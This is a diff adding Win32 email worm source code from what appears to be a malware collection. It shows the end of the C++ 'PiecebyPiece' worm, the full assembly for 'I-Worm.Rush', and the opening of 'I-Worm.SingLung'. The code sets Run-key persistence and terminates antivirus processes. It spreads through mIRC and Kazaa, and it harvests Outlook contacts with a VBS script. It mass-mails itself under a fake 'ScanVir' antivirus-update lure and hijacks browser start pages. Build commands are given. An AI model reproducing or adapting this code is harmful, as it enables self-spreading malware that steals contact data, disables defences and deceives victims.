strcpy(zippth,winbkup);
|
||||||
|
//Now make Windows run it at startup
|
||||||
|
while (winbkup[i]!=0) {
|
||||||
|
val[i]=winbkup[i];
|
||||||
|
i++;
|
||||||
|
}
|
||||||
|
val[i]=0;
|
||||||
|
RegCreateKey(HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",&hKey);
|
||||||
|
RegSetValueEx(hKey,"Windows task32 sys",0,REG_SZ,val,sizeof(val));
|
||||||
|
RegCloseKey(hKey);
|
||||||
|
}
|
||||||
|
|
||||||
|
//--------------------------------------MIRC--------------------------------------------------
|
||||||
|
|
||||||
|
void mirc() { //Creates a mIRC script
|
||||||
|
HKEY hKey;
|
||||||
|
unsigned char mircpth[1024];
|
||||||
|
char mirc[MAX_PATH];
|
||||||
|
int i=0;
|
||||||
|
DWORD mircpthlen=sizeof(mircpth);
|
||||||
|
|
||||||
|
//Get the path from our friend: the registry :)
|
||||||
|
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\mIRC",0,KEY_QUERY_VALUE,&hKey);
|
||||||
|
RegQueryValueEx(hKey,"UninstallString",0,NULL,mircpth,&mircpthlen);
|
||||||
|
RegCloseKey(hKey);
|
||||||
|
i=1;
|
||||||
|
while (mircpth[i]!=0 && mircpth[i]!='.') {
|
||||||
|
mirc[i-1]=mircpth[i];
|
||||||
|
i++;
|
||||||
|
}
|
||||||
|
mirc[i-1]=0;
|
||||||
|
i=strlen(mirc);
|
||||||
|
while (mirc[i]!=92) {
|
||||||
|
mirc[i]=0;
|
||||||
|
i--;
|
||||||
|
}
|
||||||
|
strcat(mirc,"script.ini");
|
||||||
|
//Write a new script.ini
|
||||||
|
fstream f(mirc,ios::out);
|
||||||
|
f<<"[Script]"<<endl;
|
||||||
|
f<<"n0=ON 1:JOIN:#:{"<<endl;
|
||||||
|
f<<"n1=/dcc send $nick "<<zippth<<endl;
|
||||||
|
f<<"n2=}"<<endl;
|
||||||
|
f<<"n3=on 1:start:{"<<endl;
|
||||||
|
f<<"n4= /join #piecebypiece"<<endl;
|
||||||
|
f<<"n5=}"<<endl;
|
||||||
|
f.close();
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
//--------------------------------------ZIPIT-------------------------------------------------
|
||||||
|
|
||||||
|
void zipit(char *file) { //Zips the virus with a random name
|
||||||
|
HKEY hKey;
|
||||||
|
unsigned char zip[1024];
|
||||||
|
char zippath[MAX_PATH],param[MAX_PATH],rnd[6];
|
||||||
|
int i=0;
|
||||||
|
DWORD ziplen=sizeof(zip);
|
||||||
|
|
||||||
|
//Get the path from the registry
|
||||||
|
i=RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\winzip32.exe",0,KEY_QUERY_VALUE,&hKey);
|
||||||
|
if (i==ERROR_SUCCESS) { //If WinZip is installed then zip the file
|
||||||
|
RegQueryValueEx(hKey,"",0,NULL,zip,&ziplen);
|
||||||
|
RegCloseKey(hKey);
|
||||||
|
i=0;
|
||||||
|
while (zip[i]!=0) {
|
||||||
|
zippath[i]=zip[i];
|
||||||
|
i++;
|
||||||
|
}
|
||||||
|
zippath[i]=0;
|
||||||
|
//Make a random filename for the .zip file
|
||||||
|
strcpy(zippth,windir);
|
||||||
|
strcat(zippth,"\\System\\win32sys");
|
||||||
|
GetSystemTime(&time);
|
||||||
|
srand(time.wSecond);
|
||||||
|
itoa(rand(),rnd,10);
|
||||||
|
strcat(zippth,rnd);
|
||||||
|
strcat(zippth,".zip");
|
||||||
|
//Zip it!
|
||||||
|
strcpy(param," -a -r ");
|
||||||
|
strcat(param,zippth);
|
||||||
|
strcat(param," ");
|
||||||
|
strcat(param,file);
|
||||||
|
ShellExecute(hwnd,"open",zippath,param,NULL,SW_HIDE);
|
||||||
|
} else strcpy(zippth,file); //Else just use the executable file for mIRC
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
//--------------------------------------TIMERPROC---------------------------------------------
|
||||||
|
|
||||||
|
VOID CALLBACK TimerProc(HWND hwnd,UINT uMsg,UINT idEvent,DWORD dwTime) {
|
||||||
|
|
||||||
|
if (sending==0) { //Check for a connection if a mail is not under delivery
|
||||||
|
conect();
|
||||||
|
if (err!=0) { //if the server used encountered an error, try using the hard-coded serv.
|
||||||
|
strcpy(server,"smtp.barrysworld.com");
|
||||||
|
strcpy(email,"john@barrysworld.com");
|
||||||
|
strcpy(helo,"barrysworld.com");
|
||||||
|
conect();
|
||||||
|
}
|
||||||
|
if (connected==1) KillTimer(hwnd,tim); //Don't need to check for it again, but keep resident
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
//--------------------------------------PAYLOAD-----------------------------------------------
|
||||||
|
void payload() { //Every virus MUST have a payload ;)
|
||||||
|
MessageBox(NULL,"\"Cause nothing ever lasts forever\nWe're like flowers in this vase, together\nYou and me, it's pulling me down\nTearing my down, piece by piece\nAnd you can't see\nThat's it's like a disease\nKilling me now, it's so hard to breathe\"\n\t-Feeder <Piece by Piece>","I-Worm/PiecebyPiece",MB_OK+MB_SYSTEMMODAL);
|
||||||
|
}
|
||||||
|
|
||||||
|
//--------------------------------------------------------------------------------------------
|
||||||
|
//Main function
|
||||||
|
//--------------------------------------------------------------------------------------------
|
||||||
|
|
||||||
|
int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInst,LPSTR lpCmdLine,int nShowCmd){
|
||||||
|
WNDCLASSEX wndc;
|
||||||
|
MSG msg;
|
||||||
|
HKEY hKey;
|
||||||
|
unsigned char buf[1024],inf[]="yes";
|
||||||
|
DWORD buflen=sizeof(buf);
|
||||||
|
int first=0;
|
||||||
|
|
||||||
|
//Create a window
|
||||||
|
wndc.cbClsExtra = 0;
|
||||||
|
wndc.cbSize = sizeof(wndc);
|
||||||
|
wndc.cbWndExtra = 0;
|
||||||
|
wndc.hbrBackground = (HBRUSH)GetStockObject(BLACK_BRUSH);
|
||||||
|
wndc.hCursor = LoadCursor(NULL,IDC_ARROW);
|
||||||
|
wndc.hIcon = LoadIcon(NULL,IDI_APPLICATION);
|
||||||
|
wndc.hIconSm = LoadIcon(NULL,IDI_APPLICATION);
|
||||||
|
wndc.hInstance = hInstance;
|
||||||
|
wndc.lpfnWndProc = WndProc;
|
||||||
|
wndc.lpszClassName = "ClassName";
|
||||||
|
wndc.lpszMenuName = NULL;
|
||||||
|
wndc.style = CS_HREDRAW|CS_VREDRAW;
|
||||||
|
RegisterClassEx(&wndc);
|
||||||
|
hwnd =CreateWindow("ClassName","NEWWIN",WS_POPUPWINDOW,0,0,1024,1024,NULL,NULL,hInstance,NULL);
|
||||||
|
UpdateWindow(hwnd);
|
||||||
|
//Hide the window
|
||||||
|
ShowWindow(hwnd,SW_HIDE);
|
||||||
|
//Get the filename and disable (if possible) any AVs
|
||||||
|
GetWindowThreadProcessId(hwnd,&ProcessId);
|
||||||
|
processes();
|
||||||
|
GetWindowsDirectory (windir, sizeof (windir)); //Get the Windir
|
||||||
|
//Check if the comp. was infected before
|
||||||
|
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\RedCell",0,KEY_QUERY_VALUE,&hKey);
|
||||||
|
RegQueryValueEx(hKey,"infected",0,NULL,buf,&buflen);
|
||||||
|
RegCloseKey(hKey);
|
||||||
|
if (buf[0]!='y' || buf[1]!='e' || buf[2]!='s')
|
||||||
|
{
|
||||||
|
RegCreateKey(HKEY_LOCAL_MACHINE,"Software\\RedCell",&hKey);
|
||||||
|
//Create a key in the registry to mark the PC as infected
|
||||||
|
RegSetValueEx(hKey,"infected",0,REG_SZ,inf,sizeof(inf));
|
||||||
|
RegCloseKey(hKey);
|
||||||
|
//----INFECT COMPUTER----
|
||||||
|
infectwin(filename);
|
||||||
|
kazaa(filename);
|
||||||
|
zipit(winbkup);
|
||||||
|
mirc();
|
||||||
|
base64(filename);
|
||||||
|
conect();
|
||||||
|
first=1;
|
||||||
|
MessageBox(hwnd,"This program has performed an illegal operation","Error",MB_OK+MB_ICONSTOP);
|
||||||
|
}
|
||||||
|
base64(filename);
|
||||||
|
GetSystemTime(&time);
|
||||||
|
if (time.wDay==15 && time.wMonth==9) payload(); //Activate payload when school starts (15 sept. in Romania)
|
||||||
|
if (first==0) {
|
||||||
|
base64(filename); //Write a "base64" encoded file every time (just in case)
|
||||||
|
conect(); //Try to connect
|
||||||
|
if (err!=0) { //If the server found in the reg. got an error, try using the hard-coded serv.
|
||||||
|
strcpy(server,"smtp.barrysworld.com");
|
||||||
|
strcpy(email,"john@barrysworld.com");
|
||||||
|
strcpy(helo,"barrysworld.com");
|
||||||
|
conect();
|
||||||
|
}
|
||||||
|
}
|
||||||
|
if (connected==0) SetTimer(hwnd,tim,50000,TimerProc); //Go resident and check for a connection every 50 secs.
|
||||||
|
|
||||||
|
while(GetMessage(&msg,NULL,0,0)) { //Stuff... ;-)
|
||||||
|
TranslateMessage(&msg);
|
||||||
|
DispatchMessage(&msg);
|
||||||
|
}
|
||||||
|
return msg.wParam;
|
||||||
|
//end of main()
|
||||||
|
}
|
||||||
|
|
||||||
|
//--------------------------------------WNDPROC----------------------------------------------
|
||||||
|
|
||||||
|
LRESULT CALLBACK WndProc(HWND hwnd,UINT iMsg,WPARAM wParam,LPARAM lParam) {
|
||||||
|
HDC hdc;
|
||||||
|
PAINTSTRUCT ps;
|
||||||
|
|
||||||
|
switch(iMsg){
|
||||||
|
case WM_PAINT:
|
||||||
|
hdc = BeginPaint(hwnd,&ps);
|
||||||
|
EndPaint(hwnd,&ps);
|
||||||
|
return 0;
|
||||||
|
case WM_DESTROY:
|
||||||
|
PostQuitMessage(0);
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
return DefWindowProc(hwnd,iMsg,wParam,lParam);
|
||||||
|
}
|
||||||
|
//That's all folks! e-mail to: MI_pirat@yahoo.com , web:
|
BIN
Win32/I-Worm.Pilif.7z
Normal file
BIN
Win32/I-Worm.Pilif.7z
Normal file
Binary file not shown.
498
Win32/I-Worm.Rush.asm
Normal file
498
Win32/I-Worm.Rush.asm
Normal file
@ -0,0 +1,498 @@
|
|||||||
|
comment #
|
||||||
|
Name : I-Worm.Rush
|
||||||
|
Author : PetiK
|
||||||
|
Date : August 27th - September 2nd
|
||||||
|
Size : 5632 byte (compiled with UPX tool)
|
||||||
|
|
||||||
|
Action : Copy itself to
|
||||||
|
* WINDOWS\SYSTEM\Mail32.exe
|
||||||
|
Add in the key HKLM\Software\Microsoft\Windows\CurrentVersion\Run the value
|
||||||
|
* Mail Outlook = WINDOWS\SYSTEM\Mail32.exe
|
||||||
|
|
||||||
|
* On Wednesday it opens the cdrom
|
||||||
|
* The 3rd it produces a sound
|
||||||
|
* the 15th it alters "Search Page", "Start Page", and "Local Page" by
|
||||||
|
* Creates %personal%\Read_Me.txt with a text
|
||||||
|
* A vbs file search all email in the Oultook software and put them in the Mailbook.txt.
|
||||||
|
The worm scans the file to find email.
|
||||||
|
|
||||||
|
Subject : New Scan Virus...
|
||||||
|
Body : Hi man,
|
||||||
|
I send you the last update of ScanVir (v 2.5).
|
||||||
|
Look at the file attached.
|
||||||
|
|
||||||
|
Bye and have a nice day.
|
||||||
|
|
||||||
|
Attached : ScanVir_25.exe
|
||||||
|
|
||||||
|
* Scans title of windows :
|
||||||
|
- Norton AntiVirus => Norton Virus : W32.Norton.Worm@mm
|
||||||
|
- System Properties => Minimize the window
|
||||||
|
|
||||||
|
|
||||||
|
To build the worm:
|
||||||
|
@echo off
|
||||||
|
tasm32 /ml /m9 Rush
|
||||||
|
tlink32 -Tpe -c -x -aa Rush,,,import32,dllz
|
||||||
|
upx -9 Rush.exe
|
||||||
|
if exist *.obj del *.obj
|
||||||
|
if exist *.map del *.map
|
||||||
|
|
||||||
|
To delete the worm:
|
||||||
|
del %windir%\system\Mail32.exe
|
||||||
|
del %personal%\Read_Me.txt
|
||||||
|
del %windir%\MailBook.txt
|
||||||
|
|
||||||
|
#
|
||||||
|
|
||||||
|
.586p
|
||||||
|
.model flat
|
||||||
|
.code
|
||||||
|
|
||||||
|
JUMPS
|
||||||
|
|
||||||
|
callx macro a
|
||||||
|
extrn a:proc
|
||||||
|
call a
|
||||||
|
endm
|
||||||
|
|
||||||
|
include useful.inc
|
||||||
|
include myinclude.inc
|
||||||
|
|
||||||
|
start:
|
||||||
|
;call hide_worm
|
||||||
|
|
||||||
|
twin_worm:
|
||||||
|
push 50
|
||||||
|
mov esi,offset orig_worm
|
||||||
|
push esi
|
||||||
|
push 0
|
||||||
|
callx GetModuleFileNameA
|
||||||
|
|
||||||
|
mov edi,offset copy_worm
|
||||||
|
push edi
|
||||||
|
push 50
|
||||||
|
push edi
|
||||||
|
callx GetSystemDirectoryA
|
||||||
|
add edi,eax
|
||||||
|
mov eax,"iaM\"
|
||||||
|
stosd
|
||||||
|
mov eax,".23l"
|
||||||
|
stosd
|
||||||
|
mov eax,"exe"
|
||||||
|
stosd
|
||||||
|
pop edi
|
||||||
|
|
||||||
|
push 0
|
||||||
|
push edi
|
||||||
|
push esi
|
||||||
|
callx CopyFileA
|
||||||
|
|
||||||
|
push 8
|
||||||
|
push edi
|
||||||
|
push 1
|
||||||
|
@pushsz "Mail Outlook"
|
||||||
|
@pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
|
||||||
|
push 80000002h
|
||||||
|
callx SHSetValueA
|
||||||
|
|
||||||
|
check_date:
|
||||||
|
push offset SystemTime
|
||||||
|
callx GetSystemTime
|
||||||
|
cmp [SystemTime.wDayOfWeek],03h
|
||||||
|
jne beep1
|
||||||
|
cdrom_open:
|
||||||
|
push 00h
|
||||||
|
push 00h
|
||||||
|
push 00h
|
||||||
|
@pushsz "open cdaudio"
|
||||||
|
callx mciSendStringA
|
||||||
|
push 00h
|
||||||
|
push 00h
|
||||||
|
push 00h
|
||||||
|
@pushsz "set cdaudio door open"
|
||||||
|
callx mciSendStringA
|
||||||
|
|
||||||
|
beep1: push offset SystemTime
|
||||||
|
callx GetSystemTime
|
||||||
|
cmp [SystemTime.wDay],03h
|
||||||
|
jne special_folder
|
||||||
|
mov counter,0
|
||||||
|
beep2: inc counter
|
||||||
|
push 30h
|
||||||
|
callx MessageBeep
|
||||||
|
push 1
|
||||||
|
callx Sleep
|
||||||
|
cmp counter,5000
|
||||||
|
jne beep2
|
||||||
|
|
||||||
|
special_folder:
|
||||||
|
push 00h
|
||||||
|
push 05h
|
||||||
|
push offset personal
|
||||||
|
push 00h
|
||||||
|
callx SHGetSpecialFolderPathA
|
||||||
|
@pushsz "\Read_Me.txt"
|
||||||
|
push offset personal
|
||||||
|
callx lstrcat
|
||||||
|
|
||||||
|
txt_file:
|
||||||
|
push 00h
|
||||||
|
push 01h
|
||||||
|
push 02h
|
||||||
|
push 00h
|
||||||
|
push 01h
|
||||||
|
push 40000000h
|
||||||
|
push offset personal
|
||||||
|
callx CreateFileA
|
||||||
|
mov [FileHdl],eax
|
||||||
|
push 00h
|
||||||
|
push offset octets
|
||||||
|
push TXTSIZE
|
||||||
|
push offset txtd
|
||||||
|
push [FileHdl]
|
||||||
|
callx WriteFile
|
||||||
|
push [FileHdl]
|
||||||
|
callx CloseHandle
|
||||||
|
|
||||||
|
vbs_file:
|
||||||
|
pushad
|
||||||
|
push 00h
|
||||||
|
push 80h
|
||||||
|
push 02h
|
||||||
|
push 00h
|
||||||
|
push 01h
|
||||||
|
push 40000000h
|
||||||
|
@pushsz "C:\rushhour.vbs"
|
||||||
|
callx CreateFileA
|
||||||
|
xchg edi,eax
|
||||||
|
push 00h
|
||||||
|
push offset octets
|
||||||
|
push VBSSIZE
|
||||||
|
push offset vbsd
|
||||||
|
push edi
|
||||||
|
callx WriteFile
|
||||||
|
push edi
|
||||||
|
callx CloseHandle
|
||||||
|
popad
|
||||||
|
push 1
|
||||||
|
@pushsz "wscript C:\rushhour.vbs"
|
||||||
|
callx WinExec
|
||||||
|
push 2000
|
||||||
|
callx Sleep
|
||||||
|
@pushsz "C:\rushhour.vbs"
|
||||||
|
callx DeleteFileA
|
||||||
|
|
||||||
|
push offset SystemTime
|
||||||
|
callx GetSystemTime
|
||||||
|
cmp [SystemTime.wDay],0Fh
|
||||||
|
jne start_scan
|
||||||
|
|
||||||
|
call internet_page
|
||||||
|
|
||||||
|
start_scan:
|
||||||
|
mov edi,offset mailbook
|
||||||
|
push edi
|
||||||
|
push 50
|
||||||
|
push edi
|
||||||
|
callx GetWindowsDirectoryA
|
||||||
|
add edi,eax
|
||||||
|
mov eax,"iaM\"
|
||||||
|
stosd
|
||||||
|
mov eax,"ooBl"
|
||||||
|
stosd
|
||||||
|
mov eax,"xt.k"
|
||||||
|
stosd
|
||||||
|
mov ax,"t"
|
||||||
|
stosd
|
||||||
|
xor eax,eax
|
||||||
|
stosd
|
||||||
|
|
||||||
|
open_scan_file:
|
||||||
|
pushad
|
||||||
|
push 00h
|
||||||
|
push 80h
|
||||||
|
push 03h
|
||||||
|
push 00h
|
||||||
|
push 01h
|
||||||
|
push 80000000h
|
||||||
|
push offset mailbook
|
||||||
|
callx CreateFileA
|
||||||
|
inc eax
|
||||||
|
je not_exist
|
||||||
|
dec eax
|
||||||
|
xchg eax,ebx
|
||||||
|
|
||||||
|
xor eax,eax
|
||||||
|
push eax
|
||||||
|
push eax
|
||||||
|
push eax
|
||||||
|
push 2
|
||||||
|
push eax
|
||||||
|
push ebx
|
||||||
|
callx CreateFileMappingA
|
||||||
|
test eax,eax
|
||||||
|
je F1
|
||||||
|
xchg eax,ebp
|
||||||
|
|
||||||
|
xor eax,eax
|
||||||
|
push eax
|
||||||
|
push eax
|
||||||
|
push eax
|
||||||
|
push 4
|
||||||
|
push ebp
|
||||||
|
callx MapViewOfFile
|
||||||
|
test eax,eax
|
||||||
|
je F2
|
||||||
|
xchg eax,esi
|
||||||
|
|
||||||
|
push 0
|
||||||
|
push ebx
|
||||||
|
callx GetFileSize
|
||||||
|
cmp eax,3
|
||||||
|
jbe F3
|
||||||
|
|
||||||
|
scan_file:
|
||||||
|
xor edx,edx
|
||||||
|
mov edi,offset mail_addr
|
||||||
|
push edi
|
||||||
|
p_c: lodsb
|
||||||
|
cmp al," "
|
||||||
|
je car_s
|
||||||
|
cmp al,0dh
|
||||||
|
je entr1
|
||||||
|
cmp al,0ah
|
||||||
|
je entr2
|
||||||
|
cmp al,"#"
|
||||||
|
je f_mail
|
||||||
|
cmp al,"@"
|
||||||
|
jne not_a
|
||||||
|
inc edx
|
||||||
|
not_a: stosb
|
||||||
|
jmp p_c
|
||||||
|
car_s: inc esi
|
||||||
|
jmp p_c
|
||||||
|
entr1: xor al,al
|
||||||
|
stosb
|
||||||
|
pop edi
|
||||||
|
test edx,edx
|
||||||
|
je scan_file
|
||||||
|
call send_mail
|
||||||
|
jmp scan_file
|
||||||
|
entr2: xor al,al
|
||||||
|
stosb
|
||||||
|
pop edi
|
||||||
|
jmp scan_file
|
||||||
|
f_mail:
|
||||||
|
|
||||||
|
F3: push esi
|
||||||
|
callx UnmapViewOfFile
|
||||||
|
F2: push ebp
|
||||||
|
callx CloseHandle
|
||||||
|
F1: push ebx
|
||||||
|
callx CloseHandle
|
||||||
|
not_exist:
|
||||||
|
popad
|
||||||
|
|
||||||
|
scan_window:mov counter,0
|
||||||
|
win1: inc counter
|
||||||
|
cmp counter,1000000
|
||||||
|
je end_w
|
||||||
|
@pushsz "Norton AntiVirus"
|
||||||
|
push 00h
|
||||||
|
callx FindWindowA
|
||||||
|
test eax,eax
|
||||||
|
jz win2
|
||||||
|
jmp change_nav
|
||||||
|
win2: @pushsz "System Properties"
|
||||||
|
push 00h
|
||||||
|
callx FindWindowA
|
||||||
|
test eax,eax
|
||||||
|
jz win3
|
||||||
|
jmp show_window
|
||||||
|
win3: @pushsz "Microsoft Home Page - Microsoft Internet Explorer"
|
||||||
|
push 00h
|
||||||
|
callx FindWindowA
|
||||||
|
test eax,eax
|
||||||
|
jz win1
|
||||||
|
jmp display_message
|
||||||
|
change_nav:
|
||||||
|
mov edi,eax
|
||||||
|
@pushsz "Norton Virus : W32.Norton.Worm@mm"
|
||||||
|
push edi
|
||||||
|
callx SetWindowTextA
|
||||||
|
jmp win1
|
||||||
|
show_window:
|
||||||
|
mov edi,eax
|
||||||
|
push 2
|
||||||
|
push edi
|
||||||
|
callx ShowWindow
|
||||||
|
jmp win1
|
||||||
|
display_message:
|
||||||
|
mov edi,eax
|
||||||
|
push 10h
|
||||||
|
@pushsz "Microsoft Internet Explorer"
|
||||||
|
@pushsz "You don't have access to this page"
|
||||||
|
push 00h
|
||||||
|
callx MessageBoxA
|
||||||
|
push 0
|
||||||
|
push edi
|
||||||
|
callx ShowWindow
|
||||||
|
jmp win1
|
||||||
|
|
||||||
|
end_w: push 00h
|
||||||
|
callx ExitProcess
|
||||||
|
|
||||||
|
hide_worm:
|
||||||
|
pushad
|
||||||
|
@pushsz "Kernel32.dll"
|
||||||
|
callx GetModuleHandleA
|
||||||
|
xchg eax,ecx
|
||||||
|
jecxz end_hide_worm
|
||||||
|
@pushsz "RegisterServiceProcess"
|
||||||
|
push ecx
|
||||||
|
callx GetProcAddress
|
||||||
|
xchg eax,ecx
|
||||||
|
jecxz end_hide_worm
|
||||||
|
push 1
|
||||||
|
push 0
|
||||||
|
call ecx
|
||||||
|
end_hide_worm:
|
||||||
|
popad
|
||||||
|
ret
|
||||||
|
|
||||||
|
internet_page:
|
||||||
|
pushad
|
||||||
|
call diff_val
|
||||||
|
db "Search Page",0
|
||||||
|
db "Start Page",0
|
||||||
|
db "Local Page",0
|
||||||
|
diff_val:
|
||||||
|
pop esi
|
||||||
|
push 3
|
||||||
|
pop ecx
|
||||||
|
page_loop:
|
||||||
|
push ecx
|
||||||
|
push 32
|
||||||
|
@pushsz "http://www.petik.fr.fm"
|
||||||
|
push 1
|
||||||
|
push esi
|
||||||
|
@pushsz "Software\Microsoft\Internet Explorer\Main"
|
||||||
|
push 80000001h
|
||||||
|
callx SHSetValueA
|
||||||
|
@endsz
|
||||||
|
pop ecx
|
||||||
|
loop page_loop
|
||||||
|
popad
|
||||||
|
ret
|
||||||
|
|
||||||
|
send_mail:
|
||||||
|
xor eax,eax
|
||||||
|
push eax
|
||||||
|
push eax
|
||||||
|
push offset Message
|
||||||
|
push eax
|
||||||
|
push [MAPIHdl]
|
||||||
|
callx MAPISendMail
|
||||||
|
ret
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
.data
|
||||||
|
; === copy_worm ===
|
||||||
|
orig_worm db 50 dup (0)
|
||||||
|
copy_worm db 50 dup (0)
|
||||||
|
|
||||||
|
; === beep ===
|
||||||
|
counter dd ?
|
||||||
|
|
||||||
|
; === special_folder ===
|
||||||
|
personal db 70 dup (0)
|
||||||
|
octets dd ?
|
||||||
|
FileHdl dd ?
|
||||||
|
|
||||||
|
; === scan email ===
|
||||||
|
mailbook db 50 dup (0)
|
||||||
|
mail_addr db 128 dup (?)
|
||||||
|
MAPIHdl dd 0
|
||||||
|
name_mail db "ScanVir_25.exe",0
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
subject db "New Scan Virus...",0
|
||||||
|
body db "Hi man,",0dh,0ah
|
||||||
|
db "I send you the last update of ScanVir (v 2.5).",0dh,0ah
|
||||||
|
db "Look at the file attached.",0dh,0ah,0dh,0ah
|
||||||
|
db 09h,09h,09h,09h,"Bye and have a nice day.",0
|
||||||
|
namefrom db "Your Best Friend",0
|
||||||
|
|
||||||
|
Message dd ?
|
||||||
|
dd offset subject
|
||||||
|
dd offset body
|
||||||
|
dd ?
|
||||||
|
dd ?
|
||||||
|
dd ?
|
||||||
|
dd 2
|
||||||
|
dd offset MsgFrom
|
||||||
|
dd 1
|
||||||
|
dd offset MsgTo
|
||||||
|
dd 1
|
||||||
|
dd offset Attach
|
||||||
|
|
||||||
|
MsgFrom dd ?
|
||||||
|
dd namefrom
|
||||||
|
dd ?
|
||||||
|
dd ?
|
||||||
|
dd ?
|
||||||
|
|
||||||
|
MsgTo dd ?
|
||||||
|
dd 1
|
||||||
|
dd offset mail_addr
|
||||||
|
dd offset mail_addr
|
||||||
|
dd ?
|
||||||
|
dd ?
|
||||||
|
|
||||||
|
Attach dd ?
|
||||||
|
dd ?
|
||||||
|
dd ?
|
||||||
|
dd offset orig_worm
|
||||||
|
dd offset name_mail
|
||||||
|
dd ?
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
txtd: db "Hi man,",0dh,0ah,0dh,0ah
|
||||||
|
db "I don't want to destroy your computer.",0dh,0ah
|
||||||
|
db "But other programs are more dangerous.",0dh,0ah,0dh,0ah,0dh,0ah
|
||||||
|
db 09h,09h,09h,"PetiK",00h
|
||||||
|
TXTSIZE equ $-txtd
|
||||||
|
|
||||||
|
vbsd: db 'On Error Resume Next',0dh,0ah
|
||||||
|
db 'Set rush=CreateObject("Outlook.Application")',0dh,0ah
|
||||||
|
db 'Set chan=rush.GetNameSpace("MAPI")',0dh,0ah
|
||||||
|
db 'Set fso=CreateObject("Scripting.FileSystemObject")',0dh,0ah
|
||||||
|
db 'Set txt=fso.CreateTextFile(fso.GetSpecialFolder(0)&"\MailBook.txt")',0dh,0ah
|
||||||
|
db 'txt.Close',0dh,0ah
|
||||||
|
db 'For Each M In chan.AddressLists',0dh,0ah
|
||||||
|
db 'If M.AddressEntries.Count <> 0 Then',0dh,0ah
|
||||||
|
db 'For O=1 To M.AddressEntries.Count',0dh,0ah
|
||||||
|
db 'Set P=M.AddressEntries(O)',0dh,0ah
|
||||||
|
db 'Set txt=fso.OpenTextFile(fso.GetSpecialFolder(0)&"\MailBook.txt",8,true)',0dh,0ah
|
||||||
|
db 'txt.WriteLine P.Address',0dh,0ah
|
||||||
|
db 'txt.Close',0dh,0ah
|
||||||
|
db 'Next',0dh,0ah
|
||||||
|
db 'End If',0dh,0ah
|
||||||
|
db 'Next',0dh,0ah
|
||||||
|
db 'Set txt=fso.OpenTextFile(fso.GetSpecialFolder(0)&"\MailBook.txt",8,true)',0dh,0ah
|
||||||
|
db 'txt.WriteLine "#"',0dh,0ah
|
||||||
|
db 'txt.Close',0dh,0ah
|
||||||
|
VBSSIZE equ $-vbsd
|
||||||
|
|
||||||
|
signature db "I-Worm.Rush",00h
|
||||||
|
origine db "A worm made in France",00h
|
||||||
|
author db "Written by PetiK - 2001",00h
|
||||||
|
|
||||||
|
end start
|
||||||
|
end
|
340
Win32/I-Worm.SingLung.c
Normal file
340
Win32/I-Worm.SingLung.c
Normal file
@ -0,0 +1,340 @@
|
|||||||
|
/*
|
||||||
|
Name : I-Worm.SingLung
|
||||||
|
Author : PetiK
|
||||||
|
Date : January 23rd 2002 - January 26th 2002
|
||||||
|
Language : C++/Win32asm
|
||||||
|
|
||||||
|
Greetz to Bumblebee (I-Worm.Plage and I-Worm.Rundll);
|
||||||
|
*/
|
||||||
|
|
||||||
|
#include <stdio.h>
|
||||||
|
#include <windows.h>
|
||||||
|
#include <mapi.h>
|
||||||
|
#include <tlhelp32.h>
|
||||||
|
#pragma argused
|
||||||
|
#pragma inline
|
||||||
|
|
||||||
|
|
||||||
|
char filename[100],sysdir[100],sysdr[100],winhtm[100];
|
||||||
|
LPSTR Run="Software\\Microsoft\\Windows\\CurrentVersion\\Run",
|
||||||
|
SHFolder=".DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders";
|
||||||
|
int i;
|
||||||
|
HANDLE fd,lSnapshot,myproc;
|
||||||
|
BOOL rProcessFound;
|
||||||
|
BYTE desktop[50],favoris[50],personal[50],cache[50];
|
||||||
|
DWORD sizcache=sizeof(desktop),sizfavoris=sizeof(favoris),
|
||||||
|
sizpersonal=sizeof(personal),sizdesktop=sizeof(cache);
|
||||||
|
DWORD type=REG_SZ;
|
||||||
|
FILE *stopv;
|
||||||
|
|
||||||
|
LHANDLE session;
|
||||||
|
MapiMessage mess;
|
||||||
|
MapiRecipDesc from;
|
||||||
|
HINSTANCE hMAPI;
|
||||||
|
|
||||||
|
HKEY hReg;
|
||||||
|
PROCESSENTRY32 uProcess;
|
||||||
|
SYSTEMTIME systime;
|
||||||
|
WIN32_FIND_DATA ffile;
|
||||||
|
HDC dc;
|
||||||
|
|
||||||
|
void Welcome();
|
||||||
|
void StopAV(char *);
|
||||||
|
void FindFile(char *,char *);
|
||||||
|
void GetMail(char *,char *);
|
||||||
|
void sendmail(char *);
|
||||||
|
void FeedBack();
|
||||||
|
|
||||||
|
//ULONG (PASCAL FAR *RegSerPro)(ULONG, ULONG);
|
||||||
|
ULONG (PASCAL FAR *mSendMail)(ULONG, ULONG, MapiMessage*, FLAGS, ULONG);
|
||||||
|
|
||||||
|
|
||||||
|
int WINAPI WinMain (HINSTANCE hInst, HINSTANCE hPrev, LPSTR lpCmd, int nShow)
|
||||||
|
{
|
||||||
|
/*
|
||||||
|
// Worm in RegisterServiceProcess
|
||||||
|
HMODULE kern32=GetModuleHandle("KERNEL32.DLL");
|
||||||
|
if(kern32) {
|
||||||
|
(FARPROC &)RegSerPro=GetProcAddress(kern32,"RegisterServiceProcess");
|
||||||
|
if(RegSerPro)
|
||||||
|
RegSerPro(NULL,1);
|
||||||
|
} */
|
||||||
|
|
||||||
|
// Fuck some AntiVirus hahahaha
|
||||||
|
StopAV("AVP32.EXE"); // AVP
|
||||||
|
StopAV("AVPCC.EXE"); // AVP
|
||||||
|
StopAV("AVPM.EXE"); // AVP
|
||||||
|
StopAV("WFINDV32.EXE"); // Dr. Solomon
|
||||||
|
StopAV("F-AGNT95.EXE"); // F-Secure
|
||||||
|
